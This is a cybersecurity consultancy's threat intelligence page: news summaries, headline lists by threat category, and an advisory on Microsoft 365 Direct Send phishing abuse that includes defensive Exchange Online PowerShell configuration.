Organisations are increasingly adopting Generative AI tools such as ChatGPT, Gemini and Copilot, with 42% already deploying them and a further 40% experimenting. While these tools drive efficiency, they have also created a culture of complacency that masks significant security risks. By 2027, over 40% of data breaches are expected to stem from improper AI use, often linked to employees unintentionally exposing sensitive data. The report highlights that without clear policies, training and continuous monitoring, firms risk leaving blind spots open to exploitation. Leadership must act now to balance AI innovation with robust security governance.

https://www.techradar.com/pro/how-genai-complacency-is-becoming-cybersecuritys-silent-crisis

Fake Employees Pose Real Security Risks

Gartner warns that by 2028 up to one in four job candidates could be artificially generated, posing major risks for organisations. Fake employees, often linked to fraudsters or hostile states, have already cost companies millions and in some cases enabled the theft of digital assets worth hundreds of thousands of dollars. The threat is most severe when these individuals gain IT roles with privileged access, giving them control over critical systems. Experts stress that prevention requires a mix of recruiter training, stronger access governance, and automated monitoring to detect suspicious behaviour before damage is done.

https://www.darkreading.com/cyberattacks-data-breaches/fake-employees-pose-real-security-risks

AI Gives Ransomware Gangs a Deadly Upgrade

Ransomware remains the leading cyber threat to businesses, with attacks rising 70% in early 2025 compared to previous years. Criminal groups are increasingly using artificial intelligence to automate attacks, launch convincing phishing campaigns, and even create deepfake impersonations of executives. While some attack volumes slowed in the second quarter due to law enforcement action and stronger defences, industries such as manufacturing, retail, and technology remain heavily targeted. Managed service providers are also under sustained attack, with phishing now accounting for over half of incidents. AI tools are making advanced attack methods widely available, lowering barriers for criminals.

https://www.helpnetsecurity.com/2025/08/22/ransomware-gangs-ai/

DORA: Six Months into a Resilience Revolution

Six months after its introduction, the EU’s Digital Operational Resilience Act (DORA) has already reshaped the financial sector, requiring firms to embed stronger controls across technology, risk, and third-party management. Nearly half of firms reported costs exceeding one million euros, while stress and workload have increased significantly for senior leaders and staff. Organisations have focused on improving risk management, reporting incidents quickly, and carrying out resilience testing that simulates real-world cyber attacks. Vendor oversight has also become a central priority, with firms demanding more assurance from suppliers. Although costly, these efforts are seen as investments to protect reputation, continuity, and long-term resilience.

https://www.techradar.com/pro/dora-six-months-into-a-resilience-revolution

Why Your Security Culture is Critical to Mitigating Cyber Risk

Research shows that nearly 60% of breaches in 2024 involved a human element, underlining that people, not just technology, are the main target for attackers. The problem is not that employees do not care about security, but that security measures are often overly complex, poorly designed, or disconnected from daily work. A strong security culture, shaped by leadership, supportive security teams, clear policies, and relevant training, is essential. Without embedding security into the way people work, even the most advanced technical defences will continue to be undermined.

https://thehackernews.com/2025/08/why-your-security-culture-is-critical.html



Threats

Ransomware, Extortion and Destructive Attacks

25% of security leaders replaced after ransomware attack | CSO Online

Ransomware is on the rise: Global cybercrime hits new highs - Digital Journal

February ransomware attacks hit record high as ThreatDown reports 25% annual surge - SiliconANGLE

Teen hackers aren't the problem. They're the wake-up call | Computer Weekly

AI gives ransomware gangs a deadly upgrade - Help Net Security

Can cyber group takedowns last? | IT Pro

Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware

Ransomware gang masking PipeMagic backdoor as ChatGPT desktop app: Microsoft | The Record from Recorded Future News

Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware | Trend Micro (US)

Insurers face challenges with UK ransomware ban

Scattered Spider affiliate given 10 year sentence, ordered to pay $13 million in restitution | The Record from Recorded Future News

Europol Says Qilin Ransomware Reward Fake - SecurityWeek

Europe's Ransomware Surge Is a Warning Shot for US Defenders

U.S. Sanctions Garantex and Grinex Over $100M in Ransomware-Linked Illicit Crypto Transactions

U.S. seizes $2.8 million in crypto from Zeppelin ransomware operator

Ransomware Victims

UK telecom provider Colt says outages were due to cyber incident | The Record from Recorded Future News

Warlock claims ransomware attack on network services firm Colt | Computer Weekly

Colt Telecom attack claimed by WarLock ransomware, data up for sale

Accounting Firm Pays Feds $175K for HIPAA Ransomware Breach

Drug development company Inotiv reports ransomware attack to SEC | The Record from Recorded Future News

Ransomware attack at DaVita impacted 2.7 million people, US health dept website shows - CNA

Phishing & Email Based Attacks

Phishing Campaign Exploits Microsoft ADFS to Evade Security

APT MuddyWater Attacking CFOs Leveraging OpenSSH, Enables RDP, and Scheduled Task

Hackers steal Microsoft logins using legitimate ADFS redirects

2.5 billion Gmail users at risk after Google's databases were hacked | PCWorld

URL-based threats become a go-to tactic for cybercriminals - Help Net Security

Study: Phishing always works, despite cyber training​ | Cybernews

Nearly half of Americans still reuse passwords despite phishing risks - BetaNews

Warning: Watch Out for This Japanese Character in Your Booking.com Email

Cybercriminals Attack VPS to Access Business Email Systems | Security Magazine

Scam Emails Are Getting Smarter—Would You Fall for These Ones?

Other Social Engineering

North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms

Fake Employees Pose Real Security Risks

Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News

Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert

URL-based threats become a go-to tactic for cybercriminals - Help Net Security

Hackers Weaponize QR Codes in New ‘Quishing’ Attacks - Infosecurity Magazine

Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages

Beyond romance fraud: The rising threat of social media scams | TechRadar

Think before you Click(Fix): Analyzing the ClickFix social engineering technique | Microsoft Security Blog

'Impersonation as a service' next big thing in cybercrime • The Register

Workday Confirms Social Engineering Cyberattack Exposing Contact Data

Workday Breach Linked to ShinyHunters Salesforce Attacks

Massive Allianz Life data breach impacts 1.1 million people

Workday Discloses Data Breach Following CRM-Targeted Social Engineering Attack - IT Security Guru

Scam Emails Are Getting Smarter—Would You Fall for These Ones?

Scammers Are Now Impersonating Cyber Crime Agents

Fraud, Scams and Financial Crime

Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert

Beyond romance fraud: The rising threat of social media scams | TechRadar

Authorized Push Payment Fraud a National Security Risk to UK - Infosecurity Magazine

How employees are using AI to fudge receipts for business expenses - and how to spot them | Daily Mail Online

Scam Emails Are Getting Smarter—Would You Fall for These Ones?

WhatsApp Privacy Myths: Encryption Flaws, Scams, and Signal Alternatives

Scammers Are Now Impersonating Cyber Crime Agents

Experts Warn Athletes Against Public Venmo Accounts

Artificial Intelligence

How GenAI complacency is becoming cybersecurity’s silent crisis | TechRadar

Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert

Fake Employees Pose Real Security Risks

AI gives ransomware gangs a deadly upgrade - Help Net Security

4 in 5 CISOs say DeepSeek must be regulated - Data Centre & Network News

URL-based threats become a go-to tactic for cybercriminals - Help Net Security

Man-in-the-Prompt: The invisible attack threatening ChatGPT and other AI systems

This Authentication Method Is Horribly Insecure—AI Just Made It Worse

78% of Businesses Are Investing in GenAI -- but Just 36% have the Infrastructure to Support It, New Unisys Study Finds

The era of AI hacking has arrived

The 'shadow AI economy' is booming: Workers at 90% of companies say they use chatbots, but most of them are hiding it from IT | Fortune

CISOs need to think about risks before rushing into AI - Help Net Security

Hackers Abuse Vibe Coding Service to Build Malicious Sites

Easy ChatGPT Downgrade Attack Undermines GPT-5 Security

New NIST guide explains how to detect morphed images - Help Net Security

Flaw in Lenovo’s customer service AI chatbot could let hackers run malicious code, breach networks | IT Pro

Scammers are sneaking into Google's AI summaries to steal from you - how to spot them | ZDNET

How web scraping actually works - and why AI changes everything | ZDNET

Microsoft mum about M365 Copilot on-demand security bypass • The Register

Claude can now stop conversations - for its own protection, not yours | ZDNET

Hundreds of thousands of Grok chats exposed in Google results - BBC News

Perplexity's Comet AI browser could expose your data to attackers - here's how | ZDNET

How employees are using AI to fudge receipts for business expenses - and how to spot them | Daily Mail Online

Agentic AI’s security risks are challenging, but the solutions are surprisingly simple | TechRadar

The invisible battlefield: Good AI vs Bad AI in the evolving cybersecurity landscape | TechRadar

Malware

How Evolving RATs Are Redefining Enterprise Security Threats

Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages

Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware

Ransomware gang masking PipeMagic backdoor as ChatGPT desktop app: Microsoft | The Record from Recorded Future News

Budget Mac.c Infostealer Rivals AMOS Amid 101% macOS Threat Surge

New FireWood Malware Attacking Linux Systems to Execute Commands and Exfiltrate Sensitive Data

XenoRAT malware campaign hits multiple embassies in South Korea

USB Malware Campaign Spreads Cryptominer Worldwide - Infosecurity Magazine

Popular npm Package Compromised in Phishing Attack - Infosecurity Magazine

Legitimate Chrome VPN Extension Turns to Browser Spyware - Infosecurity Magazine

New GodRAT Trojan Targets Trading Firms Using Steganography and Gh0st RAT Code

Hundreds Targeted in New Atomic macOS Stealer Campaign - SecurityWeek

Developer jailed for malware that took out his employer • The Register

“Rapper Bot” malware seized, alleged developer identified and charged

Solana malware targeting Russian crypto developers • The Register

Mobile

UK backs down in Apple privacy row, US says - BBC News

Android VPN apps used by millions are covertly connected AND insecure - Help Net Security

Apple Patches CVE-2025-43300 Zero-Day in iOS, iPadOS, and macOS Exploited in Targeted Attacks

Apple addressed the seventh actively exploited zero-day

Novel 5G Attack Bypasses Need for Malicious Base Station - SecurityWeek

ERMAC Android malware source code leak exposes banking trojan infrastructure

How To Find And Remove Spyware From Your Android Phone

Denial of Service/DoS/DDoS

Internet-wide Vulnerability Enables Giant DDoS Attacks

“Rapper Bot” malware seized, alleged developer identified and charged

'Rapper Bot' hit the Pentagon in at least 3 cyberattacks | DefenseScoop

Internet of Things – IoT

Hackers can abuse IPv6 to hijack networks | Cybernews

System Shocks? EV Smart Charging Tech Poses Cyber-Risks

Your smart home device just got a performance and security boost for free | ZDNET

Data Breaches/Leaks

2.5 billion Gmail users at risk after Google's databases were hacked | PCWorld

Over 190 million hit in UnitedHealth data breach — confirmed largest in history | Tom's Guide

Hacker Offers to Sell 15.8 Million Plain-Text PayPal Credentials On Dark Web Forum

Canadian Financial Regulator Hacked, Exposing Personal Data from Membe - Infosecurity Magazine

Workday Confirms Social Engineering Cyberattack Exposing Contact Data

Thousands of guests at Italian hotels hit in wide-ranging cyberattack - here's what we know | TechRadar

Air France and KLM warn customers of new data breach | Fox News

4 cyberattacks that rocked global telecoms | Capacity Media

Dozens more Afghan relocation data breaches uncovered by BBC - BBC News

Colt Telecom attack claimed by WarLock ransomware, data up for sale

Millions Allegedly Affected in Allianz Insurance Breach

Orange Belgium's 850K mega-breach raises fraud fears • The Register

Elon Musk’s xAI Published Hundreds Of Thousands Of Grok Chatbot Conversations

Intel Employee Data Exposed by Vulnerabilities - SecurityWeek

Australian ISP iiNet Suffers Breach of 280,000+ Records - Infosecurity Magazine

TPG Telecom estimates 280K affected by subsidiary breach • The Register

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

USB Malware Campaign Spreads Cryptominer Worldwide - Infosecurity Magazine

Lazarus strikes again? $23m theft topples crypto platform

Lykke Exchange Shuts Down After $23M Lazarus Group Hack

US seizes $2.8 million in crypto from Zeppelin ransomware operator

Nebraska man gets 1 year in prison for $3.5M cryptojacking scheme

Solana malware targeting Russian crypto developers • The Register

Insider Risk and Insider Threats

Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert

Fake Employees Pose Real Security Risks

North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms

Study: Phishing always works, despite cyber training​ | Cybernews

Developer jailed for malware that took out his employer • The Register

KnowBe4 Finds Top Cybersecurity Risk is Employee Distraction, Not Threat Sophistication - IT Security Guru

How employees are using AI to fudge receipts for business expenses - and how to spot them | Daily Mail Online

Soldier admits handing over sensitive information to person he thought was foreign agent | RNZ News

Insurance

Insurers face challenges with UK ransomware ban

Is personal cyber insurance at an inflection point? - Insurance Post

Logistics giant's UK arm returns to profit - helped by insurance settlement after cybersecurity incident | Insider Media

Cloud/SaaS

Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems

Microsoft investigates outage impacting Copilot, Office.com

Outages

Microsoft investigates outage impacting Copilot, Office.com

Colt Customers Face Prolonged Outages After Major Cyber Incident - Infosecurity Magazine

Identity and Access Management

Phishing Campaign Exploits Microsoft ADFS to Evade Security

Hackers steal Microsoft logins using legitimate ADFS redirects

Encryption

UK Backs Down On Apple Encryption Backdoor—But The Secret Deal Raises New Questions | Techdirt

US spy chief Gabbard says UK agreed to drop 'backdoor' mandate for Apple | Reuters

The Online Safety Act isn't just about age verification – end-to-end encryption is also at risk | TechRadar

An explanation of quantum key distribution | TechTarget

Trump admin says it convinced UK to drop demand for Apple backdoor - Ars Technica

UK Drops Demand for iCloud Backdoor for American Users' Data 

FTC warns US Big Tech: Don’t bend to foreign censors • The Register

WhatsApp Privacy Myths: Encryption Flaws, Scams, and Signal Alternatives

Russia Is Cracking Down on End-to-End Encrypted Calls | WIRED

Linux and Open Source

Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems

New FireWood Malware Attacking Linux Systems to Execute Commands and Exfiltrate Sensitive Data

Passwords, Credential Stuffing & Brute Force Attacks

Nearly half of Americans still reuse passwords despite phishing risks - BetaNews

Password Party’s Over: Nearly 50% of Americans Continue to Re-use Passwrds Despite Phishing Attacks on the Rise

Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News

Password Managers Vulnerable to Data Theft via Clickjacking - SecurityWeek

Social Media

Beyond romance fraud: The rising threat of social media scams | TechRadar

Training, Education and Awareness

Study: Phishing always works, despite cyber training​ | Cybernews

Employee distraction is a bigger risk than attack sophistication - BetaNews

KnowBe4 Finds Top Cybersecurity Risk is Employee Distraction, Not Threat Sophistication - IT Security Guru

Almost all banks mandate cyber security training - Risk.net

Regulations, Fines and Legislation

US spy chief Gabbard says UK agreed to drop 'backdoor' mandate for Apple | Reuters

The UK Online Safety Act could kill the internet as we know it.

Children’s exposure to porn higher than before 2023 Online Safety Act, poll finds | Pornography | The Guardian

DORA: six months into a resilience revolution | TechRadar

The Online Safety Act isn't just about age verification – end-to-end encryption is also at risk | TechRadar

US Director of National Intelligence Claims U.K. Has Retreated from iCloud Backdoor Demands – Pixel Envy

Trump admin says it convinced UK to drop demand for Apple backdoor - Ars Technica

FTC warns US Big Tech: Don’t bend to foreign censors • The Register

UK Backs Down On Apple Encryption Backdoor—But The Secret Deal Raises New Questions | Techdirt

Insurers face challenges with UK ransomware ban

Britons back Online Safety Act’s age checks, but are sceptical of effectiveness and unwilling to share ID | Ipsos

EU: ENISA Guidelines on Compliance with NIS 2 Directive Published | DLA Piper - JDSupra

EU’s Cyber Resilience Act: As Deadline Looms, Are You Ready For It? - EE Times

How VPNs are helping people evade increased censorship - and much more | ZDNET

UK cyber leaders feel impact of Trump cutbacks | Computer Weekly

The EU NIS2 Directive and intra-group IT services | Hogan Lovells - JDSupra

Mozilla warns Germany could soon declare ad blockers illegal

Regulator rebukes Nova Scotia Power's request for secrecy in cybersecurity inquiry | CBC News

Election workers fear 2026 threats without feds' support • The Register

By gutting its cyber staff, State Department ignores congressional directives | CyberScoop

Bill would give hackers letters of marque against US enemies • The Register

Models, Frameworks and Standards

DORA: six months into a resilience revolution | TechRadar

NIS2 Update: EU Cyber Authority Sets Out Compliance Expectations, but Implementation Is a Work in Progress | Skadden, Arps, Slate, Meagher & Flom LLP - JDSupra

EU’s Cyber Resilience Act: As Deadline Looms, Are You Ready For It? - EE Times

The EU NIS2 Directive and intra-group IT services | Hogan Lovells - JDSupra

New NIST guide explains how to detect morphed images - Help Net Security

Accounting Firm Pays Feds $175K for HIPAA Ransomware Breach

Careers, Working in Cyber and Information Security

Would you hire a hacker? | Computer Weekly

Building a New Generation of Security Talent Amid an Escalating Cyber - Infosecurity Magazine

Cyber teams are struggling to keep up with a torrent of security alerts | IT Pro

Law Enforcement Action and Take Downs

Developer jailed for malware that took out his employer • The Register

US seizes $2.8 million in crypto from Zeppelin ransomware operator

Can cyber group takedowns last? | IT Pro

Scattered Spider affiliate given 10 year sentence, ordered to pay $13 million in restitution | The Record from Recorded Future News

Nebraska man gets 1 year in prison for $3.5M cryptojacking scheme

US cops seize mega DDoS-for-hire racket RapperBot • The Register

A hacker tied to Yemen Cyber Army gets 20 months in prison

'Rapper Bot' hit the Pentagon in at least 3 cyberattacks | DefenseScoop

Serial hacker who defaced official websites is sentenced - National Crime Agency

Israeli government official arrested in Nevada sex crimes operation | The Independent


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

APT MuddyWater Attacking CFOs Leveraging OpenSSH, Enables RDP, and Scheduled Task

Russia-linked gang using Cisco devices for spying​ | Cybernews

FBI, Cisco Warn of Russian Attacks on 7-Year Flaw

FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage

Nation State Actors

Swap Around and Find Out: The New Rules of International Digital Economic Warfare – War on the Rocks

China

CrowdStrike warns of uptick in Silk Typhoon attacks this summer | CyberScoop

4 in 5 CISOs say DeepSeek must be regulated - Data Centre & Network News

Microsoft scales back Chinese access to cyber early warning system

China labels US as 'surveillance empire' over chip tracking • The Register

Chinese hackers are targeting web hosting firms - here's what we know | TechRadar

Microsoft restricts Chinese firms over hacking fears | Windows Central

Chinese APT Group Targets Web Hosting Services in Taiwan - Infosecurity Magazine

China cut itself off from the global internet on Wednesday • The Register

DPRK, China Suspected in South Korean Embassy Attacks

Russia

Russia-linked gang using Cisco devices for spying | Cybernews

Russia Is Cracking Down on End-to-End Encrypted Calls | WIRED

Russian Hacktivists Take Aim at Polish Power Plant, Again

Solana malware targeting Russian crypto developers • The Register

Russian hackers lurked in US courts for years and took sealed files | Stars and Stripes

Russian investment platform confirms cyberattack by pro-Ukraine hackers | The Record from Recorded Future News

Russia-linked European attacks renew concerns over water cybersecurity | CSO Online

Russian Hackers Hitting Critical Infrastructure, FBI Warns

Iran

APT MuddyWater Attacking CFOs Leveraging OpenSSH, Enables RDP, and Scheduled Task

Hackers disrupt communications of dozens of Iranian oil and cargo ships | Iran International

North Korea

North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms

North Korea's IT worker fraud has fooled nearly every Fortune 500 firm

Lazarus strikes again? $23m theft topples crypto platform

South Korean military hit by 9,200 cyber attacks in first half of 2025, up 44% from 2024 | The Straits Times

Hackers who exposed North Korean government hacker explain why they did it | TechCrunch


Tools and Controls

Study: Phishing always works, despite cyber training​ | Cybernews

Cybercriminals Attack VPS to Access Business Email Systems | Security Magazine

Hackers Weaponizing Cisco's Secure Links to Evade Link Scanning and By-Pass Network Filters

Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News

Password Managers Vulnerable to Data Theft via Clickjacking - SecurityWeek

Scans From Hacked Cisco Small Business Routers, Linksys and Araknis are at the Raise

Hackers can abuse IPv6 to hijack networks | Cybernews

McDonald's not lovin' it when hacker exposes rotten security • The Register

Cyber teams are struggling to keep up with a torrent of security alerts | IT Pro

The EU NIS2 Directive and intra-group IT services | Hogan Lovells - JDSupra

Children’s exposure to porn higher than before 2023 Online Safety Act, poll finds | Pornography | The Guardian

Insurers face challenges with UK ransomware ban

Britons back Online Safety Act’s age checks, but are sceptical of effectiveness and unwilling to share ID | Ipsos

Employee distraction is a bigger risk than attack sophistication - BetaNews

Android VPN apps used by millions are covertly connected AND insecure - Help Net Security

This Authentication Method Is Horribly Insecure—AI Just Made It Worse

CISOs need to think about risks before rushing into AI - Help Net Security

Hackers Abuse Vibe Coding Service to Build Malicious Sites

BYOD Evolution: Essential for Hybrid Work Productivity and Security

How VPNs are helping people evade increased censorship - and much more | ZDNET

78% of Businesses Are Investing in GenAI -- but Just 36% have the Infrastructure to Support It, New Unisys Study Finds

The Security Vulnerabilities to Watch for When You’re Vibe Coding

The invisible battlefield: Good AI vs Bad AI in the evolving cybersecurity landscape | TechRadar

How to Vibe Code With Security in Mind

Attackers Start Outside: Why MSSPs Should Prioritize External Threat Intelligence | MSSP Alert

Perplexity's Comet AI browser could expose your data to attackers - here's how | ZDNET

Elastic rejects claims of a zero-day RCE flaw in Defend EDR

Is personal cyber insurance at an inflection point? - Insurance Post

Making Pen Testing a Year-Round Cybersecurity Strength | SC Media UK

Solana malware targeting Russian crypto developers • The Register



Vulnerability Management

Majority of Organizations Ship Vulnerable Code, Study Finds - Infosecurity Magazine

Attacker “Patches” Vulnerability Post Exploitation to Lock Out Competi - Infosecurity Magazine

Vulnerabilities

Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News

Researcher to release exploit for full auth bypass on FortiWeb

Microsoft releases emergency updates to fix Windows recovery

At least three UK organizations hit by SharePoint zero-day hacking campaign | The Record from Recorded Future News

FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage

Internet-wide Vulnerability Enables Giant DDoS Attacks

Apple discloses actively exploited zero-day affecting iOS, iPadOS and macOS | CyberScoop

Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware

Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware | Trend Micro (US)

Multiple Chrome High-Severity Vulnerabilities Let Attackers Execute Arbitrary Code

U.S. CISA adds Trend Micro Apex One flaw to its Known Exploited Vulnerabilities catalog

Over 800 N-able servers left unpatched against critical flaws

Scans From Hacked Cisco Small Business Routers, Linksys and Araknis are at the Raise

Easy ChatGPT Downgrade Attack Undermines GPT-5 Security

Xerox fixed path traversal and XXE bugs in FreeFlow Core

New Elastic EDR 0-Day Vulnerability Allows Attackers to Bypass Detection, Execute Malware, and Cause BSOD

High-Severity Vulnerabilities Patched in Chrome, Firefox - SecurityWeek

Public Exploit for Chained SAP Flaws Exposes Unpatched Systems to Remote Code Execution

Commvault plugs holes in backup suite that allow remote code execution - Help Net Security

Perplexity's Comet AI browser could expose your data to attackers - here's how | ZDNET

Elastic rejects claims of a zero-day RCE flaw in Defend EDR

Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems

Microsoft Windows 11 24H2 Update May Cause SSD Failures | TechPowerUp


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

  • Automotive

  • Construction

  • Critical National Infrastructure (CNI)

  • Defence & Space

  • Education & Academia

  • Energy & Utilities

  • Estate Agencies

  • Financial Services

  • FinTech

  • Food & Agriculture

  • Gaming & Gambling

  • Government & Public Sector (including Law Enforcement)

  • Health/Medical/Pharma

  • Hotels & Hospitality

  • Insurance

  • Legal

  • Manufacturing

  • Maritime & Shipping

  • Oil, Gas & Mining

  • OT, ICS, IIoT, SCADA & Cyber-Physical Systems

  • Retail & eCommerce

  • Small and Medium Sized Businesses (SMBs)

  • Startups

  • Telecoms

  • Third Sector & Charities

  • Transport & Aviation

  • Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness. Linking to or reposting external content does not endorse any service or product; likewise, we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Alert 18 August 2025 – Microsoft 365 Direct Send abuse enabling internal-appearing phishing

Black Arrow Cyber Alert 18 August 2025 – Microsoft 365 'Direct Send' abuse enabling phishing emails from internal addresses

Executive summary

Security researchers and vendors have confirmed active campaigns abusing Microsoft 365’s Direct Send feature to deliver emails that look like they originate from inside an organisation, without any mailbox compromise or authentication. The messages often utilise Microsoft infrastructure and can bypass external security controls, increasing the likelihood of credential theft and business email compromise. Microsoft has released a control that tenants can enable to reject unauthenticated Direct Send. Additional configuration can prevent direct delivery to the tenant when the domain’s MX records point to a third-party gateway.

What’s the risk to me or my business?

Attackers can send emails that impersonate your own users or departments. Common themes include voicemail or fax alerts and PDFs that contain QR codes leading to credential-harvesting pages. Because delivery uses Microsoft endpoints, messages may appear internal and can evade external filtering paths, undermining user trust and raising the success rate of social engineering and payment fraud.

Increased risk of further exploitation through other vulnerabilities

Successful credential theft enables lateral movement, mailbox rule abuse, internal spear-phishing and financial fraud. Some campaigns inject messages via unsecured third-party relays and VPS infrastructure before final delivery to Microsoft 365, complicating attribution and forensics.

What can I do?

Given active exploitation, immediate action is advised.

  1. If you do not need Direct Send, block it
    Enable the organisation setting to reject unauthenticated Direct Send traffic using PowerShell. This blocks anonymous messages where the envelope sender domain matches one of your accepted domains. Test, then monitor for breakage in legacy devices or services.

  2. If you need Direct Send, authenticate and restrict it
    Create inbound partner connectors and restrict by TLS certificate (preferred) or by approved IP ranges for printers, applications and third-party services that must send as your domain. Where full rejection is not yet possible, use transport rules to quarantine unauthenticated internal-looking mail while you add exceptions for legitimate sources.

  3. Prevent direct delivery bypass when MX points to a third party
    If your MX is not Exchange Online, configure an inbound connector and set restrictions so only your approved gateway path can deliver to the tenant. This closes the direct-to-tenant path that might otherwise bypass external filtering.

  4. Strengthen authentication and policy
    Enforce SPF, DKIM and DMARC with a reject policy, and tune anti-spoofing. Treat unauthenticated internal-looking messages as suspicious. Consider transport rules that quarantine them by default.

  5. Hunt and monitor
    Use Historical Message Trace, Threat Explorer, or Advanced Hunting to identify messages received without an attributed connector. Hunt for unauthenticated internal-looking mail, composite authentication failures and unusual attachment patterns such as PDFs with QR codes.

  6. Prepare users
    Brief staff that internal-looking emails can be forged. Call out common lures and warn specifically about QR-code attachments. Encourage out-of-band verification for sensitive requests.
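The Exchange Online PowerShell commands behind steps 1 to 4, as an added example that is not part of the original alert or of Microsoft’s guidance. It assumes placeholder values throughout: an accepted domain of contoso.example, a printer fleet whose TLS certificate is issued to mfp.contoso.example, an internal application sending from 198.51.100.0/24, and a third-party mail gateway at 203.0.113.0/24.

```powershell
# Added example (not Black Arrow's or Microsoft's code). All domains, IP
# ranges and certificate names below are placeholders; replace them with
# your own and pilot each change before applying it tenant-wide.
Connect-ExchangeOnline -UserPrincipalName admin@contoso.example

# Step 1: reject unauthenticated Direct Send at the tenant boundary.
# Read the current value first so the change can be reverted if legacy
# devices break.
Get-OrganizationConfig | Select-Object RejectDirectSend
Set-OrganizationConfig -RejectDirectSend $true

# Step 2a: devices that must still send as your domain authenticate
# through a partner connector restricted by TLS certificate (preferred).
New-InboundConnector -Name "Printers (certificate)" `
    -ConnectorType Partner `
    -SenderDomains "contoso.example" `
    -RequireTls $true `
    -RestrictDomainsToCertificate $true `
    -TlsSenderCertificateName "mfp.contoso.example"

# Step 2b: where certificate-based TLS is not available, restrict the
# sending domain to an approved source IP range instead.
New-InboundConnector -Name "Line-of-business app (IP)" `
    -ConnectorType Partner `
    -SenderDomains "contoso.example" `
    -RestrictDomainsToIPAddresses $true `
    -SenderIPAddresses "198.51.100.0/24"

# Step 3: when MX points at a third-party gateway, accept inbound mail
# for any sender domain only from that gateway's addresses, closing the
# direct-to-tenant path that bypasses external filtering.
New-InboundConnector -Name "Third-party gateway only" `
    -ConnectorType Partner `
    -SenderDomains "*" `
    -RestrictDomainsToIPAddresses $true `
    -SenderIPAddresses "203.0.113.0/24"

# Step 4: quarantine-first transport rule for tenants not yet ready to
# block. Internal-looking mail that fails composite authentication is
# quarantined unless it arrives from an approved source above.
New-TransportRule -Name "Quarantine unauthenticated internal-looking mail" `
    -SenderDomainIs "contoso.example" `
    -HeaderContainsMessageHeader "Authentication-Results" `
    -HeaderContainsWords "compauth=fail" `
    -ExceptIfSenderIpRanges "198.51.100.0/24","203.0.113.0/24" `
    -Quarantine $true

Disconnect-ExchangeOnline -Confirm:$false
```

The SPF, DKIM and DMARC reject policy in step 4 is published in DNS rather than in Exchange Online, so it is not shown here.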

Technical Summary

Abuse mechanism
Direct Send allows devices and applications to send to internal recipients without authentication via tenant smart hosts such as tenantname.mail.protection.outlook.com. Threat actors send spoofed messages to those endpoints using internal-looking From addresses, often with scripted SMTP clients.

Observed tactics
Lures frequently mimic voicemail or fax notifications and include PDFs with QR codes that resolve to credential harvesters. Some campaigns relay through unsecured third-party email appliances or VPS infrastructure before final delivery.

Why it lands
Messages traverse Microsoft infrastructure and can be treated as internal, so they may land in inboxes or junk despite composite authentication failures, especially where mail routing is complex or controls are not locked down.

Microsoft controls
Microsoft introduced a tenant-wide Reject Direct Send setting, plus guidance on preventing direct delivery to the tenant and on quarantine-first transport rules for organisations not ready to block.

Activity timeline
Campaigns observed since May 2025, with multiple vendors reporting ongoing abuse through July and August 2025.

Further information

  • Microsoft Exchange Team: Introducing more control over Direct Send in Exchange Online. Public preview of Reject Direct Send, behaviour and error text. (TECHCOMMUNITY.MICROSOFT.COM)

  • Microsoft Exchange Team: Direct Send vs sending directly to an Exchange Online tenant. Lockdown patterns, connectors, hunting and quarantine-first rules. (TECHCOMMUNITY.MICROSOFT.COM)

  • Varonis Threat Labs: Ongoing campaign abusing Direct Send to deliver internal-appearing phishing, with timeline and technique details. (Varonis)

  • Proofpoint: Attackers abusing M365 for internal phishing, delivery paths via unsecured relays, and recommended mitigations. (Proofpoint)

  • Mimecast Threat Intelligence: Direct Send abuse overview, observed artefacts and recommendations. (Mimecast)

  • eSentire Advisory: Direct Send abuse leading to internal phishing, QR-code lures and response guidance. (eSentire)

  • Barracuda: Securing Microsoft Direct Send, attack summary and guidance. (Barracuda Blog)

  • IRONSCALES: Inside Job: attackers spoofing emails with M365 Direct Send, controls to reduce risk. (IRONSCALES)

  • BleepingComputer: Microsoft 365 Direct Send abused to send phishing as internal users. (BleepingComputer)

 

Need help understanding your gaps, or just want some advice? Get in touch with us. 

#threatadvisory #threatintelligence #cybersecurity

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 15 August 2025

Black Arrow Cyber Threat Intelligence Briefing 15 August 2025:

-Over 29,000 Exchange Servers Still Unpatched Against High-Severity Flaw

-Nearly Half of Enterprises Tested Had Easily Cracked Passwords

-Leaked Credentials Up 160% - What Attackers Are Doing With Them

-Ransomware Attacks Up by 41% Globally

-Physical Threats to Crypto Owners Hit Record Highs

